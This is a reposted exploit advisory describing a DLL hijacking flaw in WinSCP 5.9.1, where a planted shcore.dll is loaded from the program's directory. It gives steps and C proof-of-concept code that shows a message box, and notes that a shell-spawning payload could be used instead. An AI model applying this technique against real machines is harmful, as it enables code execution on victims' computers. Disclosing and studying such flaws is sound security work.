Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2016090050

Below is a copy:

WinSCP DLL Hijacking Exploit (shcore.dll)# Exploit Title: WinSCP DLL Hijacking Exploit (shcore.dll)
# Date: 03-09-2016
# Author: Ashiyane Digital Security Team
# Vendor Homepage:http://winscp.net/
# Software Link: http://winscp.net/download/WinSCP-5.9.1-Setup.exe
# Version:5.9.1
# Tested on:Windows 7
# Exploit by : Amir.ght
#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#
Vuln DLL: shcore.dll
WinSCP is an open source free SFTP client, FTP client, WebDAV client
and SCP client for Windows.
Its main function is file transfer between a local and a remote computer.
WinSCP.exe will search for an load any DLL named "shcore.dll".
If an attacker can place the DLL in a location
where victim open WinSCP.exe it will load and run the attackers DLL
and code.
also can generate a msfpayload DLL and spawn a shell, for example.

#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+
# Exploit:

1- Save and compile below C code as 'shcore.dll' to create vuln DLL

2- Place 'shcore.dll' on Same Directory of WinSCP

3- Open WinSCP.exe

//gcc test.c -o shcore.dll -shared
//this dll show a message box
#include <windows.h>
#define DllExport __declspec (dllexport)

BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
return 0;
}

int dll_hijack()
{
MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);
return 0;
}
#################################
Discovered By : Amir.ght  #######
#################################

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.